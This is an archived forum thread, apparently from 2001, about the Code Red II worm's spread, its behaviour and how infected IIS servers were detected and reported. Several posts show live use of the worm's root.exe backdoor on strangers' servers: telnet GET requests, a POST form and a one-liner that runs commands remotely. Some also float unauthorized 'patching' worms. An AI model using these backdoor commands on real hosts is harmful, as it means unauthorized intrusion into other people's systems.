Suggestion to any White-hat hackers thinking of making a 'Code Green' worm/patch;

1. Make the patch obnoxious and embarass the slacking admins. Write a file or program that points out that the rest of the world is getting angry that they aren't doing a minimum to secure thier own systems. Put the message in the About...Windows box, put it in a message that pauses the system on boot, put it on the desktop(s), put it on the Start menu somewhere.

I'm sick of this shit. If I weren't a Libertarian, I'd be for licencing admins before they can play on the Internet. Even without MS code on my servers, I still pay for thier shoddy work.

Re:Now that is funny!

[sdo1]

Right now this dude is looking at his server logs and thinking "Awesome! I can't believe how many people are pumped about my resume! Job offers are going to be ROLLING in any second!"

-S

Re:Ooops bad paste. Take two.

[cyberdonny]

Found it:

> telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET /scripts/root.exe?/c+dir HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 09:35:11 GMT
Content-Type: application/octet-stream
Volume in drive D has no label.
Volume Serial Number is A8A2-CE97

Directory of d:\inetpub\scripts

2001-06-03 04:12a <DIR> .
2001-06-03 04:12a <DIR> ..
2001-06-13 09:07a 289 default.asp
2001-06-13 09:07a 289 default.htm
2001-06-13 09:07a 289 index.asp
2001-06-13 09:07a 289 index.htm
2000-01-10 09:00p 310,544 root.exe
5 File(s) 311,700 bytes
2 Dir(s) 353,468,416 bytes free
Connection closed by foreign host.

Re:C:\dos C:\dos\run | run\dos\run

[Eeeeegon]

This worm is combining TWO worms; both the Code Red worm we know and love, and the less-recent SANDMIND worm (sp?), famous for running of DOS commands and posting an anti-US webpage at 'default.asp', 'default.html', 'index.asp', and 'index.html' on directories relative to the website root. Apparently this worm is using 'cmd.exe' to get root access; what it does beyond that, I have no idea... I haven't been hit by it. I guess the logic is .... if the box isnt patched against Code Red, chances are it isn't patched against SANDMIND, too.

Also, 90% of the 'NNNN's in my server logs came from my Class A subnet (and much more frequently than the 'XXXXX' requests).

Logs available upon request, etc.

The end is near...

[TrevorB]

So let me get this straight... Every machine on the planet practically has a list of infected IP addresses broadcasted to them, with a new one arriving every minute or so (up to 663 XXX's here in the past two hours).

So that means any loser with this list of infected IPs and some knowledge of perl literally has a small army of computers at their command?

I think we might be seeing some rather impressive DDoS attacks by this evening.

Hmm.. 3 more XXX's in the time it took me to write this... frequency's increasing...

Re:A few more details:It's a root trojan

[Drone-X]

I found that you must do "GET /scripts/root.exe" without the HTTP/1.0 for it to work.

Oh yeah, since you can't enter command to the prompt you need to pass the commands to execute as arguments to root.exe (which is really cmd.exe). You can do this by typing "GET /scripts/root.exe?/C%20dir" or something like that. Or you could enter http://somehost/scripts/root.exe?/C%20dir into your favourite browser.

I've found that typing absolute paths doesn't work for some reason, but http://somehost/scripts/root.exe?/C%20dir%20"..\.. \Documents%20and%20Settings\All%20Users\Desktop\" (remove the spaces) should bring you to the desktop.

I wanted to leave a message to the admin on the desktop but I have no idea how to do that since "echo" is part of cmd.exe and piping probably won't work too. Perhaps omeone with WinNT skills could offer some ideas?

Server 403's

[nebby]

I've noticed that a lot of the infected servers are 403'ing me ("Too Many Connected Users") so I'm guessing that once our Chinese (or, for you conspiracy theorists, Microsoft employee) buddies get their stuff setup on their 0wned boxes they turn IIS to allow one connection only or something to block everyone else besides them out.

The obvious conclusion is that they're setting up for a DoS or something. Sucks to be the target they should choose.. 100,000 UDP packet sources anyone? Eerk.

IIS is installed by default in Win2k

[Phrogman]

If you are installing Win2k server on a box, you get IIS by default - and its enabled. You have to actually go and disable it. This is probably the biggest problem, in that every copy of Win2k server installed on any box is also a webserver. What do you want to design badly today?

Re:IIS is installed by default in Win2k

[mpe]

If you are installing Win2k server on a box, you get IIS by default - and its enabled. You have to actually go and disable it.

Even if you disable it, even that's not the end of it. You have to make sure it stays disabled. Which means checking everytime you install software or change which "Windows Components" you have.

Re:Something that should happen more often.

[spectecjr]

Let's count the number of remote expoits for apache and IIS and decide which system is more secure

A pity that this won't actually give you any kind of realistic indication as to how insecure they actually are.

To do that you'd also need to know how many attempts to find exploits on each were made. It's more likely that Apache just hasn't been hammered on as much.

Simon

Re:There's been stacks of Unix worms this year

[Nailer]

RWXS is not what I call a permission system, and if it is, its a very course grained system, certainly not usable on an everyday file server. And yes I'm serious. Imagine templates for a word processor. A group needs to read and write them. A group needs to read them. All other users must not have access. Can't do it with rwxs, and most Unix shops don't (they use Windows and Netware for file servers).

Windows users get to choose between an actual VMS / Trusted Nix style permission system or nothing at all. That's choice.

Most services can be chrooted, but they're not. The FHS doesn't even care about chrooted services - they should be standard. Most services don't need root privileges (yay capabilities), but they use them.

I prefer Linux over Windows for my own work, but for others, the best tool for the job is Windows.

@home preventative measures

[WereTiger]

Apparently @home is monitoring it's customers for Code Red.
I'd JUST reinstalled Win2k Pro on a new system, I'd added IIS for my own purposes and before I had a chance to run the service pack and patch, I got the Code Red worm (ok, so I was lazy and tired and was going to leave it for the morning)

@home unbound my cablemodem until I'd cleared the worm (disable IIS, reboot).

normally, I'd be a little annoyed at @home for monitoring my connection and cutting my connection rather than just block all traffic to that IP at router level. but hey, it saved me from contributing to a problem.

Re:@home preventative measures

[cybrthng]

You sure you just didn't dos yourself of the net? :)

Personally i don't see @Home taking you off and noticing you fixed it and putting you back online.

Check your outtage listings for your area.

Re:it really is heavy in 24.*.*.*

[cworley]

The strange thing is the flood of ARP "who-has" requests.

I'm on 24... too, and my activity light is blinking like my son's running a gnutella client (but he's not), and tcpdump is showing a flood of arp "who-has" packets... for a couple hours now.

My bandwidth seems good... in fact, better than normal... probably because I don't do WinDoh's.

Re:Hypothesis

[Saint+Aardvark]

Holiday weekend here in Canada...one more day of this. Oh boy.

Re:test

[tulare]

Err... looks like I forgot to close the tag. D'oh!

What are you talking about?

[whatnotever]

"Code red algorithm"??? It's called a random ip scan. In this variation, it's called a scan of the local subnet with a random ip thrown in every now and then. There's nothing special about it.

It's fast because that's how exponential growth works.

Re:What are you talking about?

[baptiste]

BY bizarre, I meant the way it appeared in teh logs. You're right, this a big improvement over the original worm and helped this worm spread faster.

Re:What are you talking about?

[baptiste]

Steve Friedl believes he has figured out the bizarre scanning of the new strain. From DSLReports forums:

OK, I know how the scanning works now. The worm starts with the user's IP address, and then changes adds a variable number of random octets. Let's say that our web server is on 192.168.1.7:

• One time out of eight, and entirely random IP address is generated
• Four times out of eight, the lower octet of the IP address is randomized (192.168.1.X)
• Three times out of eight, the lower two octets are randomized (192.168.X.Y)

This is entirely consistent with the patterns we've been seeing, so if somebody on your local network gets infected, you're gonna get pounded until they fix it.

Another point: if the web server in question is behind a NAT firewall, it will go nuts scanning the internal network. For a large company that has many NT systems internally, they will spend all day trying to infect each other.

What a worm.

Steve
--
Stephen J. Friedl / Software Consultant / Tustin, California USA / www.unixwiz.net

Looks like somebody did their homework and decided to really make Code Red nasty

Re:Free r00t for all!

[Malcontent]

You really think that your average windows luser moron will actually put two and two together? Come now get real. They will probably just hit the home button so they can go to MSN and catch up with the latest Britteny Spears news.

Autorespond with a $250 consulting fee

[IvyMike]

This variant installs a backdoor. Whenever you're attacked, your host should automatically respond by telnetting into the back door, installing the MS IIS patch, and send the sysadmin a $250 'consulting fee' for fixing their server. (This is slightly different than the oft-suggested "why not making a patching worm?")

Back on a serious note: How long will it be before someone starts suing the owners for letting their computer be a platform for an attack? Not long, I fear. I guess we'll see a huge upsurge in linux and apache installations when that day comes, though.

Re:Something that should happen more often.

[MajroMax]

Man, I'm glad that I'm not using Minesweeper. This new virus exploits an unexploded mine in Minesweeper, and it does use Outlook and the stupidity of users. Luckily, I'm running OpenMine, so I'm not at risk. In fact, OpenMine has protected me from 2^37-302 virii. And just look at the millions of dollars that I've saved using OpenMine. I hope that this OpenMine takes off, along with OS/2. Unfortunately, my doghouse has to pay for the stupidity of Microsoft: this virus sucked 212 nibbles of bandwidth!

Re:This web page was changed...

[Saint+Aardvark]

ARGHHH.

grep ida /foo/bar/log | awk '{print $1}' | sort | uniq |\
awk '{print "<a href=\"http://" $1 "\">" $1 "</a><br>"}'

I don't see a problem

[KidSock]

Aug 5 00:04:13 nano kernel: Packet log: input DENY ppp0 PROTO=6 204.172.72.112:4474 208.162.198.38:80 L=48 S=0x00 I=56830 F=0x4000 T=119 SYN (#19)

Re:POSTing to root.exe?

[chabotc]

Yes, quite easy actual, the line to get a directory listing would be: GET /scripts/root.exe?/c+dir HTTP/1.0

My range...

[heliocentric]

Well, with everyone feeling the need to chime in about what ranges they see like we did when we were taking bets if school would be canceled, I just felt like saying:

Nothing from the 192.168.0.x range here!!

=)

It's certainly more ambitious...

[David+E.+Smith]

I just pulled out the logs from the home Web server on a 24.x.x.x cable modem (which never really does anything but redirect people to my real Web server). The original tried to attack my Apache web server about a dozen times over three days; this one, over the past four days, has tried over 200 attacks.

Re:It's certainly more ambitious...

[David+E.+Smith]

Nope, it's definitely getting worse. Another 15 hits in the past hour (since I put up a l'il script to log them separately, and to attempt to email the responsible parties).

Something that should perhaps be part of another thread: For each attack, I'm now sending out one email, to [webmaster && postmaster]@[domain]. Is this actually a good/ethical idea? Under the circumstances, I'm hoping it won't be interpreted as spam. The text of the email is, roughly:

From: (my email address)
To: (as above)
Subject: You are afflicted with Code Red or a variant!

Your machine, at IP address (blah), appears to be infected with the Code Red virus. Information on how to fix this system vulnerability is at (url that I don't remember right now).
Thank you.
...dave

Re:It's certainly more ambitious...

[baptiste]

Well, many organziations are doing this automagically. All they want is your logs.

DShield has a system setup. Just execute this command if you run Apache in your log directory:

grep 'default.ida' access_log* | mail -s 'APACHE' redalert@dshield.org

THis way they can identify all teh compromised hosts and contact the owners.

The ARIS team @ SecurityFocus is doing something similar

Re:It's certainly more ambitious...

[nathanm]

I've had the opposite experience. I got over 60 hits in the first round of the Code Red worm, and 32 from this round tonight.

Re:Why don't they...

[tswinzig]

Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...

Nah, this will just make the sysadmins even lazier.

SysAdmin #1: Dude, your NT machines are all infected with Code Red!

SysAdmin #2: I know! I'm just waiting for for them to be infected with the fix... should be any day now...

Gotta love Zone Alarm...

[Bonker]

Of course, I'd never run IIS on my workstation, let alone a server, but it's fun to watch the HTTP requests come in on ZA.

Now, let's see if ZA logs contain enough information to determine if it's a Code Red attack or just another port scanner....

Breakdown of the new "features" of CRII

[2675636B20796F75]

Ok, here's the latest on this new variant.

1. It makes a copy of CMD.EXE called ROOT.EXE in the;

\inetpub\scripts

and

\program files\common files\system\msadc

directories. Does this on both drive C: and D: (doesn't fail if D: doesn't exist).

2. It then runs its attack program code to infect itself upon numerous other boxes. This is done randomly, although there is a bias to attack boxes that are part of the same class A as infected attacker (so it hits your own boxes sooner rather than later). Attack code runs for 24 hours, 48 hours on Chinese language systems.

3. After attack code runs (and it seems to be based on clock ticks, not date), it then writes out a Trojan.

File Explorer.exe (8192bytes or 7K as displayed by Windows) is dropped (from the code in the original attacking URL) to the root of drive C: and D: (again, doesn't matter if D: doesn't exist).

4. The system is then rebooted (probably a forced reboot).

5. When the system restarts, it loads the trojan Explorer.exe from the root directory on the boot drive. This code then does several things;

a) Launches the real Explorer.exe, so the system looks normal.

b) Sets SFCDisable in hklm\software\microsoft\windows nt\currentversion\winlogon to some undocumented value. Presumably this disables Windows File Protection (so critical files could be overwritten)

c) Creates two virtual directories (via the registry) in hklm\system\currentcontrolset\services\w3svc\param eters\virtual roots. Called "C" and "D", they are mapped to the root directories of the two drives and permissions are established in the virtual directory to allow script, read, and write access as well as setting execute permissions to scripts and executables.

d) goes into an endless sleep loop.

The end result of all of this action is to leave your box wide open to remote connection and total compromise.

Unlike "Code Red", this worm doesn't attack any single target at any point, although its attack strength seems to be much higher (it launches 300 threads right off, although some may only launch 100), so its propagation seems much higher.

The attack only works properly on Windows 2000 systems (preliminary analysis). ICSA Labs tested against an NT 4.0/IIS 4.0/SP3 box and received a standard error message. Reports from subscribers suggest that XP IIS 5.1 RC1 is invulnerable also. Its expected that it works on PWS and OWS equally to IIS (all on W2K).

Its obviously a short-lived attack, at least the process of collecting victims. What would be done with them once collected is another story. No attempt is made by the worm to send anything "home", although detecting compromised boxes is far too easy (very unfortunately) for anyone outside your network.

Cleaning a compromised box should really be done by reformatting. Although logging is left on for the new virtual directories created (meaning you'd see access in your IIS logs), there's really no way to be sure that files haven't been implanted to leave other backdoors (not as part of this worm, but as part of the use of the opening it creates).

Credits:

The bulk of the analysis was done by Nick Fitzgerald of Virus-L (and friends) and Roger Thompson of TruSecure. Additional help came from Bruce Hughes of the ICSA Labs.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

Re:Breakdown of the new "features" of CRII

[SCHecklerX]

Hi Russ,

Since when does TruSecure and ICSA Labs make official statements via slashdot? I sure hope you talked to some people before you posted this.

Re:Easier to track the source now?

[J'raxis]

Nah, that was just the first occurrence on your subnet. It had to get there somehow. Even though this thing is concentrating on subnets, it must branch out or otherwise it wouldn't've propagated outside the subnet it started on. I'm seeing it on 66; others are reporting it on 4, 24, and more.

Re:logs

[mashy]

I wrote a crude script that does this but mails information to abuse departments of ISPs where they can match up the hosts with their users and contact them if they wish. The parent poster may want to add this feature to his code, and I might clean my code up later and post it.

Re:what is code red. .

[mpe]

Someone should copyright the "code red algorithm".

Or maybe patent it. Also how about sending the BSA after anyone running it without a licence.

Re:Something that should happen more often.

[Malcontent]

Considering that Apache is the most widely used web server you'd think it would be attacked more. OK maybe the apache folk are nice and ethical people who don't call people comminists or un-american and therefore don't piss off as many people but still a kiddie is not that selective.

Re:If this can't break Microsoft's back nothing wi

[cyberdonny]

> The genuine 8-Ball . Mysticism on demand!

Just tried it. The question I asked was "will code red ii sink microsoft". The answer was... guess what...no, not that one, we're talking about Code Red here, not Sircam.

It was: "Most likely".

Re:URM. Thjs is NOT good. GG Microsoft

[Greyfox]

There seems to be a happy little program called iisreset:

http://support.microsoft.com/support/kb/articles/Q 202/0/13.ASP

May I suggest iisreset /stop?

Re:the real kicker is

[Simon+Brooke]

You know, you're missing the point. A well set up UN*X box takes very little administration. The cost of administering a UN*X box will normally be lower than a Windows box doing the same job, because although the administrator costs more, you need h[im|er] for fewer hours.

POSTing to root.exe?

[nebby]

Has anyone figured out how to execute commands using a POST request to root.exe? My curiosity (heh heh :)) has made me play with it a bit (but not too much, don't want the feds knocking on my door asking me what the phrase "Hacked by Chinese!" means to me) .. I can't seem to figure it out.

I tried variants of the following:
<HTML>
<BODY>
<FORM METHOD="POST" ACTION="http://xx.xx.xx.xx/scripts/root.exe">
<INPUT TYPE="SUBMIT" NAME="" VALUE="exit&#13;&#10;">
</FORM>
</BODY></HTML>

trying to send exit to the shell, but the "script" (root.exe) never finishes. I'm guessing that the data is coming over the pipe but lynx won't show it to me until the request is finished. I tried passing the NAME %1, %2, etc. (DOS style) but that didn't work either.

As soon as I get a directory listing I am going to have a moment of silence for all these poor fucks.

Re:POSTing to root.exe?

[GC]

Very nice advice:

Here is a oneliner:

Usage popup

#!/bin/sh
echo "GET /scripts/root.exe?+/c+start+http://www.digitalisla nd.com/codered/ HTTP/1.0" | telnet $1 80

Now how do I get it to tail my apache log and automatically run?

Re:If this can't break Microsoft's back nothing wi

[meta-monkey]

WHY do i have to pay extra for the functionality of NOT being succeptable to virii and net attacks?

Actually, you don't. Linux is free :-p

Re:Proposal for White Hat'ing CR][

[geomcbay]

You might want to keep in mind that any scripts you write to fix compromised Code Red servers will technically be hack attempts (you will be accessing computer systems you are not authorized to access).

Despite the best intentions you will be breaking the law. Keep that in mind.

Nothing new

[isorox]

Several of us in #ljr on openprojects.net have being getting this for ages.

I'm getting one atack about every 20 minutes, most are from servers that dont have anything on, although I've had a couple of "real" websites attack me.

http://isorox.dyndns.org/~iso/ is a monitoring thing.

Re:the real kicker is

[clifyt]

I'm going to have to defend the guy as I run Windows as well.

In Depth Knowledge of FP2000 - Any of ya'll actually use this crap? I can't figure it out. I have clients that do EVERYTHING in FP and on occasion I'm called in to help them out. I COULD tell them to pick up Dreamweaver, but most are unwilling to pay for it...they use FP as it came bundled. I COULD tell them how to do everything from notepad and then how to set up an FTP connection through the cli, but if I did that I wouldn't be working for them. I wish I knew how people used this piece of crap software as I've never been able to get it to do crap for me, yet idiots seem to figure it out enough to connect to their servers and screw up pages. In this sense, ya use what the client is using...if you don't you aren't much of a consultant.

Same goes with Windows. I tell all my users that I can set up *nix boxes for their networks. This would be really fricken cool IF I was on site more than an hour or two a month. These guys all want to admin their own servers and to be honest, the costs saved by doing it themselves far outweigh the cost of getting zapped by any of the worms - so far - for a small business. If you can't afford a full time WinAdmin, you certainly can't afford a full time UnixAdmin.

WinAdmins are a dime a dozen and EVERYONE knows enough to be able to set these damn things up. Most businesses I deal with have a semi-dedicated winadmin whom is part network assistant / mostly something else. Its something I can show a business how to do in an afternoon with a few small books left in case they need them.

On the other hand, I have a thousand page UNIX book that I still consider a starters guide that I've used for over 10 years now - "UNIX System V Release 4 - An Introduction" and it doesn't even cover things like Apache or SendMail in depth (or at all...I can't remember...I got enough other books on those subjects). Its a fricken introduction for christ's sakes. I could have gotten a few MCSE's from a book that size.

So fuck it...if ya'll want to play the assholes and be all high and mighty about how 'l33t ya'll are go ahead. Its exactly the reason you had no friends in high school. Geeks think they are always right and everyone else is wrong. Its the same attitude the jocks had, but worse.

I HATE M$ and I wouldn't suggest using it to anyone, BUT if someone suggests it to me, I'm going to give them the best service I can on that platform and I'm not going to turn my nose up at them. And YES, I did get hit by RedCode last time and this was after doing everything M$ said to do...Oops, apparently if you make any changes to the system AFTER you've done these, certain things will reenable all the changes you've made. I've now got a system where my boys have to go through a tedious proceedure ANYTIME they [install / uninstall / reconfigure] anything on my WinServers to ensure that nothing was undone. To be honest, it wouldn't be a bad practice on *nix to do the same thing and reaffirm all patches / etc stayed intact after installs. With the new RPMs (ok they are new to me...I'm use to installing with a MAKE) you don't know what the hell is being upgraded or what dependencies are being imported a good deal of the time.

Shit, anymore its almost simpler than Winders...rpm some app and find they've rewritten your secured files with something wide open and the win boys will be laughing at all you dumbass linux people...now who'd CLI over an app without knowing what was on it?

Re:Now that is funny!

[billh]

Look at his street address...

436 attempts so far

[Teferi]

@Home is indeed apparantly getting hit hard.

Re:If this can't break Microsoft's back nothing wi

[tswinzig]

The licensing issue is irrelevant too. If my microwave catches fire, I can sue somebody. If my custom-built house collapses, I can sue somebody. If my shotgun explodes, I can sue somebody.

First of all, the question is not IF you can sue SOMEBODY. You can ALWAYS sue somebody. The question is, does your case stand a chance in hell of being won?

Secondly, who would we sue if Linux was found to have a serious flaw like the one in IIS? Don't you dare say the flaw would be fixed, because the flaw in IIS has already been patched, about 2 months ago, well before Code Red came out.

Re:I'm getting pounded at 216.

[Saint+Aardvark]

Cancel my above comments -- in the twenty minutes since starting up Apache, I've logged 7 unique IPs all in 216., all CRII.

Re:logs

[Darth+Paul]

careful - the new strains use default.ida?XXXXXXX. Just grepping for default.ida should be enough...

Re:cisco 675 hanging.

[Uller-RM]

Turning the web server off is not enough - it will still crash it. Your only course of action is to either:

1) Contact your ISP, have your connection changed to a static IP if it isn't already, and use RFC1483 bridging.

2) Upgrade to version 2.4.2 of the CBOS firmware.

Re:Why don't they...

[aozilla]

it fights fire with fire but its still illegal.

It fights fire with water... A fire in someone else's house... Which would have set your house on fire too, except it's made of fireproof material (or you have a "firewall" between your houses).

May or may not be legal when you look at it that way. I'm pretty sure you can legally break into someone's house if you see flames coming out of the roof.

Re:logs

[JediTrainer]

Holy shit! I just ran that against my logs, and I've got 493 so far!

Good thing I'm running Apache :)

Re:C:\dos C:\dos\run | run\dos\run

[ananke]

according to ntbugtraq, the worm copies cmd.exe to the scripts dir under iis. i've been getting a lot of these now in my snort log:

[**] [1:1002:1] WEB-IIS cmd.exe access [**]
[Classification: Attempted User Privilege Gain] [Priority: 8]
08/04-20:59:21.340539 165.247.90.38:3711 -> 165.247.246.23:80

from different ip's etc.

Re:logs

[Kryptolus]

For those who are interested in the source:
http://www.kryptolus.com/red.txt

On another note, a server whose identity I will not name(solaris w/ apache) was hit with 17000 attacks as of yesterday(the server handles a lot of ips).

Re:Hypothesis

[cyberdonny]

It can only get better... I'm already looking forward to Code Red III, to be released on the second anniversary of the Red Hat IPO.

Who known, maybe now is the time to buy again some RHAT stock... Indeed, people will need another OS once they've thrown out MShit.

Re:logs

[Saint+Aardvark]

I've said it before, I'll say it again:

Mail those logs!

From http://dshield.org/codered.html:

As you have probably heard, the Code Red worm has infected over 100,000 machines running Microsoft IIS, and the total is rising. We need to identify the infected machines so that the owners of these machines can be notified so that they can be fixed. We are appealing to DShield submitters to do a special one time only submission for log entries that contains this information.

Linux and other *NIX users Can do this by changing to the directory where your web server logs are located and executing a script like this:

grep 'default.ida?NNNNN' access_log | mail -s 'APACHE' redalert@dshield.org

Re:Something that should happen more often.

[tswinzig]

Ha ha, that was funny! Of course we know worms never infect unix or open source systems !

Attempts here

[spinfire]

I've compiled a list of IPs that have made 404 hits on default.ida. Companys like @home and speakeasy (my ISP) need to crack down on IIS users on home DSL networks and get them to install the patch. This many infected hosts is not a good thing.

Re:Why don't they...

[david+duncan+scott]

Yes, and it would be especially funny if, like Robert T. Morris Jr. before you, you weren't quite as smart as you thought.

Mountain Dew

[Speare]

All this comes at a bad time for Mountain Dew's new fruity flavor, called Code Red, too.

First month it's on the market, and the brand new trademark is sullied by bad references to computer hacking, worms, viruses and international disputes. Is there truly "no bad publicity"?

Of course, like the word 'spam' and the Hormel product SPAM(tm), trademark law rightfully doesn't support serious legal implications, and wouldn't stand a chance against mob inevitability even if it did. Just kinda funny to watch it happen.

Re:Mountain Dew

[Fishstick]

>sullied by bad references to computer hacking

This doen't appear to be the case, at least not in the covenience store located in my building at work. Hearing the reference to the new soda 'popular with hackers' in the news report about the worm, I looked it up on Pepsi's website (having never heard of it).

When I discovered that it was a Mountain Dew flavor, I decided to wander downstairs to see if the guy had it in, and to possibly check it out.

"No, it is all gone... should have some more it by Monday."

Stopped at the local Dominick's yesterday where it was the same story. If anything, the worm has generated free publicity, seemigly resulting on a run on the product in the Elk Grove/Schaumburg/Palatine suburban area.

Remember, there is no such thing as "bad" pubilicity, right?

Re:Bookmarklet for IIS detection?

[Simon+Brooke]

Here it is (I did this quite a while ago)

javascript:void(window.open( %22http://www.netcraft.co.uk/whats/?host=%22 + window.location))

On the same subject, check HTML validity:

javascript:void(window.open( %22http://validator.w3.org/check?uri=%22 + window.location))

... CSS validity...

javascript:void(window.open( %22http://jigsaw.w3.org/css-validator/validator?ur i=%22 + window.location))

... links ...

javascript:void(window.open( %22http://www.htmlhelp.com/tools/valet/linktest.cg i?url=%22 + window.location))

... bookmarklets are fun!

While you're at it...

[jeffsenter]

Why don't you make it Code Red Hat... the worm finds machines infected and then reformats them and installs Redhat. That would take care of the MS infinite bug problem.

Seriously though it should be Microsoft releasing a antidote virus that cleans up all their crappy infected servers. It seems like Microsoft is allowing this to continue because they get a ton of free media coverage... any publicity is good publicity.

If this can't break Microsoft's back nothing will.

[cybrthng]

If there isn't one thing that can break the straw nothing will.

I'm warned that smoking and drinking are bad for my health

Medicines and drugs aren't legal unless they're fully tested and approved

My car doesn't lock up and freeze

My microwave doesn't blue screen and cook my brain inside out.

SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be succeptable to cracks and attacks that are easily preventable.

WHY do i have to pay extra for the functionality of NOT being succeptable to virii and net attacks?

WHY doesn't microsoft NOTIFY me of the risks of using its OS?

I hope no ones bank is trusting microsoft, i hope anyone doing online transactions don't trust microsoft. I hope no one keeps personal, private, confidential and financial data on there pc's.

I hope no one running Windows is on the internet for that matter.

Re:MSNBC Coverage

[baptiste]

They are now: http://msnbc.com/news/606910.asp

C:\dos C:\dos\run | run\dos\run

[mcleodnine]

Seeing a lot of "XXXX" and far fewer "NNNN" in the logs. This version appears to stay crunchier in milk than the first. Up to 25-30 per hour, from 10 this afternoon. The 24.x.x.x may be getting slammed, but I can see another that is just as bad.

Snipped from incidents dot org (emphasis added)

Both Henk Wevers and corecode submitted packet traces of the complete request as shown below. Comparing this trace with the original Code Red (see the Code Red Infection Illustrated section of the July 23 Handler's Diary at: http://www.incidents.org/diary/july2001.php) it is immediately obvious that we are dealing with a new worm. Note that line 820 shows that the worm is doing something with CMD.EXE; also the dump contains the string 'CodeRedII' on line 230. Note the references to root.exe on lines 840 and 880.

Article also mentions that it appears the compromised servers are backdoored and rooted. Ouch.

The editorial accusations of crying wolf might look a little pale this evening...

Re:@home problems...

[sharkey]

I'm getting rapidly poked here in Indy, connected to Comcast@HOME. They've gone off the net for more than an hour after 22:00 EST the last few nights. I don't know if the outages are from CodeRed I or II, or from @HOME's usaul technical competence.

Never name a virus by the name its author intended

[cyberdonny]

From the article:

In particular, the fact that it has "CodeRedII" inside means that it couldn't possibly be the original worm -- the name wasn't attached until after it was released.

If this beast is truely wicked, it will scan assorted websites such as Slashdot, Wired, etc, and as soon as it will see talk about itself it will enter its active phase...

URM. Thjs is NOT good. GG Microsoft

[nyet]

$ telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 05:51:06 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>

Game over man, game over.

Broken random number generator (again!)

[cperciva]

It looks like someone has a broken random number generator again.

At least, that's the only explanation I can see for the fact that out of 250 attacks I've seen so far, 47 came from the same source IP. Admittedly, it being in the same /16 I'd expect to see more attacks from it, but unless it scans the entire /16 every 5 seconds I think it is a sign of a broken random number generator.

Come on guys, if you're going to try to bring down the internet, at least do it right!

Tomorrow's writeups today! ;)

[Scoria]

!!! CODE RED 2 !!!
Steve Gibson of Gibson Research Corporation

Greetings,

As I said in my last warning, the Internet had *NOT* seen the last of the Code Red virus. The threat of a dangerous, Internet-wide infection is dangerous and real, made even worse by Microsoft Windows XP's *built-in* support for RAW SOCKETS.

Microsoft does not understand the *BLANTANTLY OBVIOUS* danger presented by RAW SOCKETS left to the hands of their users. After all, any PERSONAL COMPUTER which utilizes Windows XP (and its EXTREMELY DANGEROUS RAW SOCKETS) will be infected by a Code Red variant sometime in the future! It is *INEVITABLE.*

With the new "features" of Code Red 2, such as the backdoor created by it, any 13 YEAR OLD SCRIPT KIDDIE could take down the entire Internet by starting a random DDoS attack from random IPs to random ports on other random IPs using malicious code similar to that contained in the Code Red virus!!!

***IMAGINE THE CHAOS. THE THREAT IS REAL...***
I REPEAT, THE THREAT IS REAL.

IMAGINE WHAT OTHER VULNERABILITES COULD BE DISCOVERED IN MICROSOFT'S WINDOWS DDoS XP BEFORE RELEASE! WHEN THEY ARE FOUND, EVERYONE KNOWS I'LL BE THERE TO SAY "I TOLD YOU SO!"

The beginning of the end of free rides...

[pongo000]

...on @home for those who run small, low-bandwidth http servers. Most of the attacks on my Apache box have been from the 65.x.x.x subnet belonging to @home. I suspect @home will start scanning for open 80 ports, much as they did with port 119 when @home received the USENET death penalty.

Re:A few more details:It's a root trojan

[lalleglad]

OK, I tried this on a couple of the hosts that I have in my access logfile, but after a few successful attempts it got boring.

I wonder what I can do after getting the prompt? After I get:

c:\inetpub\scripts>

I don't know what to do, but I would like to send an email to the webmaster telling him to stop letting his server sending me crap, however I have tried 'dir' and 'cd' which I thoiught were simple commands, but the link then seems to be stuck, ie. nothing happens.

If anyone has info about what can be done there I'd like to hear.

An email from his own machine by someone else ought to scare him to DO something about it!

Re:logs

[ConsumedByTV]

post the perl script? I would be very thankful :)

Re:But does it actually *do* anything different?

[ryanr]

It installs a back door. (As indicated in the link referenced.)

And the depressing thing is...

[Simon+Brooke]

I wrote the following shell script to mail webmasters on infected hosts:
#!/bin/bash

# OK: the rationale behind this is that it will lookup the name of each host
# which probes us with the Code Red style probe, and then see whether that
# name resolves back to the number. If it does there's some hope that it's a
# real host, so we'll try to mail webmaster@

log=$HOME/codered.log

for ip in `grep default.ida /var/log/httpd/access_log |\
awk '{print $1}'`
do
grep "$ip" $log > /dev/null

if [ $? -ne 0 ]
then # it's not there
echo $ip >> $log # remember so we don't mail them again

host=`dig -x $ip -Aq +nocmd +nostats +noheader +noauthor \
+noaddit | tail -3 | awk '{print $5}' | sed 's/\.$//'`

echo -n "Seen $ip [$host]"

echo $host | grep '^[a-z0-9.-]*$' > /dev/null

if [ $? -eq 0 ]
then
echo -n "...appears to be valid..."

valid=`nslookup $host | tail -2 | grep '^Address:' |\
awk '{print $2}'`
fi

if [ "$ip" = "$valid" ]
then
mail -s "Your machine appears to be infected by Code Red" \
webmaster@$host <<EOF

Dear Webmaster

We have received a request for 'default.ida' from your server at
$ip. This is usually an indication that you have been
infected by the 'Code Red' or 'Code Red II' worm, currently
attacking Microsoft IIS servers. To secure your server, download
and install the appropriate patch from Microsoft


* Windows NT 4.0:
http://www.microsoft.com/Downloads/Release.asp?Rel easeID=30833

* Windows 2000:
http://www.microsoft.com/Downloads/Release.asp?Rel easeID=30800

Or, better still, switch to a proper operating system
EOF
echo " ...mailed"
else
echo " ? not valid?"
fi
fi
done

I've been hit by 61 different unique IP's today, of which 17 had IPs which resolved to addresses which resolved to the same IPs. So how many of my mails were actually accepted for delivery?

That's right, none.

Re:Why are unix hosts getting hit so hard with thi

[Saint+Aardvark]

I suspect that mainly it's cos 1) this is a pretty UNIX-heavy forum, and 2) grepping logs and such is easier/more common in Unix than in MSLand.

Re:Something that should happen more often.

[Malcontent]

